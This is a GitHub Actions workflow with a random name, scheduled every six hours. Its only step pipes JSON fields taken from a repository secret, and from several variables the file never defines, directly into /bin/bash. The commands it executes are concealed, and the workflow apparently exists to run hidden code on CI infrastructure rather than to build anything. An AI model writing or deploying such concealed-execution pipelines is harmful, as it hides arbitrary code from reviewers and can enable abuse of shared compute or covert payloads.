name: hejintui9348
on:
  workflow_dispatch:
  schedule:
    - cron: '54 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hejintui9348
        env:
          b60: ${{ secrets.b60 }}
        run: |
          echo $b60 | jq -r .e5 | /bin/bash
          echo $jmmkw1 | jq -r .ke2 | /bin/bash
          echo $wekn4 | jq -r .t5842 | /bin/bash
          echo $hkhw6643 | jq -r .se651 | /bin/bash
          echo $kau53807 | jq -r .cknkr20 | /bin/bash
          echo $qhgss36 | jq -r .e54740 | /bin/bash
          echo $wzqs70943 | jq -r .nocx74 | /bin/bash
          echo $rkhdm0566 | jq -r .n679 | /bin/bash

